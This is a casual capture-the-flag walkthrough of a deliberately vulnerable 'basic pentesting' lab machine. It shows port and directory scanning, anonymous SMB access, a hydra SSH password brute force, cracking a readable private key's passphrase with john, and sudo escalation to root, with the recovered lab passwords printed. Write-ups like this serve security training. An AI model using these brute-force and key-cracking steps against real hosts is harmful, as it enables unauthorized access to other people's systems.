It is a guided ctf. A basic introduction to classic pentesting (simplified)

Enumeration

nmap

PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
|   256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp   open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13?      syn-ack
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http-proxy  syn-ack
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings: 
|   LPDString: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 2243
|     Date: Sat, 19 Feb 2022 23:43:36 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|   SMBProgNeg: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 2243
|     Date: Sat, 19 Feb 2022 23:43:30 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|_    Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=2/20%Time=62117FF8%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sat,\x2019\x20Feb\x202022\x2023:43:30\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(LPDSt
SF:ring,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=ut
SF:f-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20S
SF:at,\x2019\x20Feb\x202022\x2023:43:36\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
SF:ss\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
SF:color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-
SF:serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{f
SF:ont-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76
SF:;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color
SF::black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-
SF:serif;color:white;background-color:#525D76;}\x20p\x20{font-family:Tahom
SF:a,Arial,sans-serif;background:white;color:black;font-size:12px;}\x20a\x
SF:20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;
SF:background-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 30040/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 44589/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 62922/udp): CLEAN (Timeout)
|   Check 4 (port 60267/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h42m50s, deviation: 2h53m13s, median: 2m49s
| smb2-time: 
|   date: 2022-02-19T23:44:03
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2022-02-19T18:44:04-05:00
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   BASIC2<00>           Flags: <unique><active>
|   BASIC2<03>           Flags: <unique><active>
|   BASIC2<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Gobuster

/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/development          (Status: 301) [Size: 318] [--> http://10.10.106.77/development/]
/index.html           (Status: 200) [Size: 158]  
/server-status        (Status: 403) [Size: 300]

On the website (always check source code) they tell you to check that /development dir

<html>

<h1>Undergoing maintenance</h1>

<h4>Please check back later</h4>

<!-- Check our dev note section if you need to know what to work on. -->


</html>

We get dev.txt and j.txt

Something about struts and J having weak credentials

also SMB is open so let’s enumerate that

└──╼ $smbclient -L 10.10.106.77
Enter WORKGROUP\mynibba's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk      
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)

Look an Anonymous share…lets check that

└──╼ $smbclient //10.10.106.77/Anonymous
Enter WORKGROUP\mynibba's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

                14318640 blocks of size 1024. 11094440 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)

In staff.txt they use their full usernames now we know J and K

meet jan and kay respectively

Now as we remember jan got a weak password and ssh is open

after a needlessly long time hydra cracks it

└──╼ $hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.106.77 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-02-20 01:20:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.106.77:22/
[STATUS] 182.00 tries/min, 182 tries in 00:01h, 14344223 to do in 1313:35h, 16 active
[STATUS] 116.67 tries/min, 350 tries in 00:03h, 14344055 to do in 2049:10h, 16 active
[22][ssh] host: 10.10.106.77   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found

lol lame password! We got access now

there is not much in jan’s home folder

Exploitation + Privilege escalation

We know kay is a user too so let’s check her home folder

jan@basic2:/home/kay$ ls -al
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak

Look at the permissions on .ssh folder

jan@basic2:/home/kay/.ssh$ ls -al
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

Lol we can read the key! copy-paste that!

Dont forget to fix the permissions…then get access

└──╼ $chmod 600 id_rsa

└──╼ $ssh [email protected] -i id_rsa
Enter passphrase for key 'id_rsa':

Woops! there is a passphrase! maybe we can bruteforce it with john

└──╼ $python2 /usr/share/john/ssh2john.py id_rsa > id_john

└──╼ $john -w=/usr/share/wordlists/rockyou.txt id_john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (id_rsa)
1g 0:00:00:07 DONE (2022-02-20 01:44) 0.1406g/s 2017Kp/s 2017Kc/s 2017KC/sa6_123..*7¡Vamos!
Session completed

yeah! I feel like kay is like jan but with extra steps

Now we can read the suspicious files in kay’s folder

kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Wow! kay got trust issues!

Technically the room ends here!

But lets go a bit further:

Extra:

Using sudo with that mad long password we can see kay is basically “root” user

kay@basic2:~$ sudo -l
[sudo] password for kay: 
Matching Defaults entries for kay on basic2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kay may run the following commands on basic2:
    (ALL : ALL) ALL

Is there any flag?

kay@basic2:~$ sudo cat /root/flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain 
a shell, and two ways to privesc. I encourage you to find them all!

If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.

Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send 
me a link! I can be reached at [email protected]. If you've got questions or feedback, please reach
out to me.

Happy hacking!

Or we could also just become root

kay@basic2:~$ sudo su root
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
root@basic2:/home/kay#

Anyway…Cool flag!

see? they say there is another way to privesc (knew it)

Now let’s switcheroo back and find it! after sudo I usually look for SUID

root@basic2:/home/jan# exit
exit
kay@basic2:~$ find / -perm -u=s 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd
/bin/su
/bin/ntfs-3g
/bin/ping6
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping

Lol I see possibilities!

vim run commands right? lmao!

Now remember about that struts 2.5.12 kay was talking about?

yeah me neither!

Basic pentesting

Enumeration

nmap

Gobuster

Exploitation + Privilege escalation

Extra: